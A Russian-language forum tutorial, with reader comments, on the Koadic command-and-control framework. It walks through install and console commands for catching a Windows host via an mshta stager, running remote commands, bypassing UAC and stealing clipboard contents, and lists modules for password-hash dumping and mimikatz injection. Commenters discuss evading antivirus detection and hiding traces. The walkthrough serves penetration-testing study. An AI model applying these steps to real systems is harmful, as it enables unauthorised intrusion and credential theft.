Статья Koadic - Command & Control

Всем привет! Этой статье хочу рассмотреть достаточно полезный инструмент, для проведения тестов на проникновение, в частности, это постэкплуатационная утилита, ниже подробнее.

upload_2017-12-3_20-31-12.png


Koadic, или COM Command & Control, представляет собой постэкплуатационный инструмент для Windows, подобный другим инструментам для проведения тестирования на проникновение, таким как Meterpreter и Powershell Empire. Основное различие заключается в том, что Koadic выполняет большую часть своих операций с помощью Windows Script Host (JScript / VBScript) с совместимостью в ядре, для поддержки установки по умолчанию в Windows 2000 без каких-либо обновлений (и, возможно, даже версий NT4) в Windows 10 ОС.

Можно полноценно использовать полезную нагрузку в памяти, с этапа 0 до конца, а также использовать криптографически защищенную связь через SSL и TLS (в зависимости от того, что активировала ОС жертвы).

Koadic совместим как с Python 2, так и с Python 3.

Функционал:

1. Захват зомби хостов

2. Повышение привилегий (обход UAC)

3. Дамп паролей SAM/SECURITY

4. Сканирование локальной сети на открытые SMB-порты

5. Переключение на другую машину

Модули:

Захватывают цели и позволяют использовать импланты.

1. stager/js/mshta –полезная нагрузка в памяти с использованием MSHTA.exe HTML-приложений

2. stager/js/regsvr – полезная нагрузка в памяти с помощью regsvr32.exe COM + scriptlets

3. stager/js/rundll32_js –полезная нагрузка в памяти с помощью rundll32.exe

4. stager/js/disk – полезная нагрузка с использованием файлов на диске

Импланты:

· implant/elevate /bypassuac_eventvwr - Использует эксплойт eventvwr.exe enigma0x3 для обхода UAC в Windows 7, 8 и 10.

· implant/elevate/bypassuac_sdclt - Использует эксплойт sdclt.exe для enigma0x3 для обхода UAC в Windows 10.

· implant/fun/zombie - Открывает The Cranberries YouTube в скрытом окне.

· implant/fun/voice - Воспроизведение сообщения по тексту в речь.

· implant/gather/clipboard - Получает текущее содержимое пользовательского буфера обмена.

· implant/gather/hashdump_sam - Извлекает хэшированные пароли из SAM.

· implant/gather/hashdump_dc – Дампинг хэшей контроллера домена из файла NTDS.dit.

· implant/inject/mimikatz_dynwrapx - Инъективно загружает DLL для запуска powerkatz.dll (используя Dynamic Wrapper X).

· implant/inject/mimikatz_dotnet2js - Внедряет DLL с отражающей загрузкой для запуска powerkatz.dll.

· implant/inject/shellcode_excel - Выполняет произвольную загрузку shellcode (если установлен Excel).

· implant/manage/enable_rdesktop - Включает удаленный рабочий стол в целевой среде.

· implant/manage/exec_cmd – Выполняет произвольную команду на целевом хосте.

· implant/pivot/stage_wmi - Захват зомби-хоста на другой машине, используя WMI.

· implant/pivot/exec_psexec - Выполнение команд на другой машине, используя psexec из sysinternals.

· implant/scan/tcp – Сканирует порты на целевом хосте.

· implant/utils/download_file - Загружает файл с целевого хоста

· implant/utils/upload_file - Загружает файл с атакующей ОС на целевой хост.

Атакующая ОС: Kali Linux 2017.3

Целевой хост: Windows 8.1: Full Update.

Рабочая среда: Локальная сеть, Интернет.

Установка и запуск:

Код:
git clone https://github.com/zerosum0x0/koadic

cd koadic/
ls –a

upload_2017-12-3_20-32-7.png


Код:
pip install –r requirements.txt

upload_2017-12-3_20-32-27.png


Код:
./koadic

upload_2017-12-3_20-32-49.png


Справка:

Код:
help

upload_2017-12-3_20-33-34.png


После запуска Koadic, по умолчанию используется модуль mshta, если возникает необходимость его сменить, используем команду:

Код:
use

И выбираем из доступных, необходимый.

upload_2017-12-3_20-34-18.png


Теперь необходимо исключить появление ошибки:

upload_2017-12-3_20-34-29.png


Эта ошибка возникает вследствие использования русского языка в целевой системе, решается очень просто:

Код:
nano /Pentest/koadic/core/session.py

upload_2017-12-3_20-34-53.png


Для своего исследования я оставляю модуль по умолчанию - stager/js/mshta и настрою его необходимым образом:

upload_2017-12-3_20-35-3.png


Запускаем модуль:

Код:
run

upload_2017-12-3_20-35-27.png


Теперь, необходимо выполнить данную команду на целевом хосте в среде CMD.

Немного теории:

· Mshta.exe – это исполняющий файл в Windows, разработанный корпорацией Microsoft и поставляющийся вместе с операционной системой. Элемент является объектом запуска Microsoft HTML Application – программы, которая отвечает за работу HTML-приложений (.hta файлы) и запуск сценариев в Windows.

upload_2017-12-3_20-35-38.png


После выполнения данной команды, на атакующей ОС, в качестве ZOMBIE, появится целевой хост.

upload_2017-12-3_20-35-55.png


Запросим подробную информацию о захваченном хосте:

Код:
zombies 0

upload_2017-12-3_20-36-24.png


Теперь, можно обратиться к командной строке захваченного хоста с помощью модуля - implant/manage/exec_cmd.

Код:
use implant/manage/exec_cmd
info

Выберем команду, которая будет выполнена:

Код:
set CMD dir
run

upload_2017-12-3_20-37-25.png


Имплант отрабатывает успешно, выберем еще один для теста, например, повышение привилегий в системе: - implant/elevate/bypassuac_eventvwr

Код:
use implant/elevate/bypassuac_eventvwr
info
set PAYLOAD 0

upload_2017-12-3_20-37-58.png


И для закрепления, попробуем еще один имплант, он позволит извлечь данные из буфера обмена:

Код:
use implant/gather/clipboard
run

upload_2017-12-3_20-38-37.png


Мое мнение, инструмент довольно удобен. Есть несколько негативных моментов, которые, я уверен, увижу в комментариях. На том все, спасибо за внимание.
 

Вложения

  • upload_2017-12-3_20-35-44.png
    upload_2017-12-3_20-35-44.png
    1,3 КБ · Просмотры: 312

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Добрый вечер, подскажите а как с детектом имплантов?
 
O

OneDollar

Эх, опередили меня )) Планировал вчера написать, но столкнулся с другой ситуацией и написал про нее) Спасибо за статью, особенно за решение конфликта с русским языком! Хотелось бы отметить на счет детека. Если данную команду запихнуть в батник, то неделю назад когда я тестил на нодистр результат был полностью FUD! Мне это еще тогда понравилось! Из минусов: куча грязи в процессах. Просто после каждых действий надо за собой подтирать сидеть, это напрягает и палит что кто-то в системе засел. Я его использую с целью узнать что да как в системе, какой антивирус, в зависимости от этого потом закинуть другую удочку. Но в целом потенциал есть и очень хороший, правда долго годных апдейтов не было, но я надеюсь что они задумали что-то годное. Конечно на данном этапе конкуренцию империи не составит, но имеет место быть на нашем форуме! Автор молодец!
 
  • Нравится
Реакции: id2746, Underwood и Vander
O

OneDollar

upload_2017-12-3_22-15-8.png


sessions.py редактировал как ты показал
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
В имени пользователя латиница, да?
 

adm2

Green Team
05.07.2017
50
120
BIT
0
Добрый вечер, а как вы додумались, что именно в этом файле необходимо дописать кодировку для решения проблем с кириллицей?
[doublepost=1512580937,1512576441][/doublepost]
Рашн с пробелом

Посмотреть вложение 13654

Здесь 50 на 50

А тут нормас:

Посмотреть вложение 13655

Короче где русские есть в имени профиля, там и проблема ) я так понял

Для исправления этой ошибки при просмотре зомби нужно в файл
core/commands/zombies.py
В начало добавить
Код:
import sys
reload(sys)
sys.setdefaultencoding('utf8')

2017-12-06_22-17-59.png


И всё отобразится
2017-12-06_22-20-57.png
 
  • Нравится
Реакции: Tihon49 и OneDollar

adm2

Green Team
05.07.2017
50
120
BIT
0
Любопытно, нод32 при запуске mshta бьёт тревогу, но сессия всё равно ловится и импланты запускаются) но нод всё равно алармит)
Это как проехать на красный перед гибддшником, а он вместо штрафа тебе говорит "ты проехал на красный, я увидел, я молодец, но делать ничего не буду, мне пофиг"
Прикольный антивирь...
 

FlowLight

Green Team
31.07.2017
29
31
BIT
1
После команды use пустота :(
 

Вложения

  • Снимок экрана от 2017-12-28 05-01-08.png
    Снимок экрана от 2017-12-28 05-01-08.png
    110,6 КБ · Просмотры: 263

FlowLight

Green Team
31.07.2017
29
31
BIT
1

animi

Green Team
06.12.2016
52
46
BIT
0
Подскажите в чем бяда:
stager/js/mshta - запускаю его. подключаюсь с windows 7. Сессия прилетает, дальше implant/elevate /bypassuac_eventvwr появляется новый zombies со *, хочу получить пароль implant/inject/mimikatz_dynwrapx но выводит пустоту.
Что не так делаю?
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
23
как по мне - не проблема получить сессию,тем более когда есть unicorn ) У меня больше проблем вызывает получение прав системы ) Есть в данной софтине какой нибудь имплант,который мелкомягкие ещё не запатчили ?
 
O

OneDollar

как по мне - не проблема получить сессию,тем более когда есть unicorn ) У меня больше проблем вызывает получение прав системы ) Есть в данной софтине какой нибудь имплант,который мелкомягкие ещё не запатчили ?
Тебе прям права системы нужны? Админа мало?
 
O

OneDollar

Подскажите в чем бяда:
stager/js/mshta - запускаю его. подключаюсь с windows 7. Сессия прилетает, дальше implant/elevate /bypassuac_eventvwr появляется новый zombies со *, хочу получить пароль implant/inject/mimikatz_dynwrapx но выводит пустоту.
Что не так делаю?
Блочит ав..?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!